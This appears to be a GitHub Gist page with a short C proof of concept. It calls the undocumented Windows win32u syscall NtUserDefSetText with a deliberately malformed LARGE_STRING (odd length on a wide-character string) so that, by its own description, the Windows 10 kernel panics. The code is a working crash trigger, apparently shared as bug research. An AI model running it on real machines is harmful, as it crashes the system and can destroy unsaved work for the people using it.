-
-
Save mablae/cdfc79de1a26db4bfbf8bb03624c9578 to your computer and use it in GitHub Desktop.
NtUserDefSetText() in Windows 10 will panic if you set the ansi flag incorrectly.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <winternl.h> | |
| #include <stdio.h> | |
| #pragma comment(lib, "user32") | |
| #pragma comment(lib, "gdi32") | |
| typedef struct _LARGE_STRING { | |
| ULONG Length; | |
| ULONG MaximumLength:31; | |
| ULONG bAnsi:1; | |
| PVOID Buffer; | |
| } LARGE_STRING, *PLARGE_STRING; | |
| static CHAR kWindowText[32] = "Hello World"; | |
| int main(int argc, char **argv) { | |
| FARPROC NtUserDefSetText = GetProcAddress(LoadLibrary("WIN32U"), "NtUserDefSetText"); | |
| WNDCLASSEX WindowClass = {0}; | |
| HWND Window; | |
| LARGE_STRING DefText = { | |
| .Length = sizeof kWindowText, | |
| .MaximumLength = sizeof kWindowText, | |
| .bAnsi = FALSE, | |
| .Buffer = kWindowText, | |
| }; | |
| // This string has bAnsi set to FALSE, so an odd Length is impossible (must be a count of WCHARs) | |
| // Unless you set the flag incorrectly.. | |
| DefText.MaximumLength |= 1; | |
| DefText.Length |= 1; | |
| WindowClass.cbSize = sizeof(WNDCLASSEX); | |
| WindowClass.lpfnWndProc = DefWindowProc; | |
| WindowClass.hInstance = GetModuleHandle(NULL); | |
| WindowClass.lpszClassName = "Class"; | |
| RegisterClassEx(&WindowClass); | |
| Window = CreateWindowEx(0, "Class", "Window", 0, CW_USEDEFAULT, 0, 128, 128, NULL, NULL, GetModuleHandle(NULL), NULL); | |
| NtUserDefSetText(Window, &DefText); | |
| return 1; | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment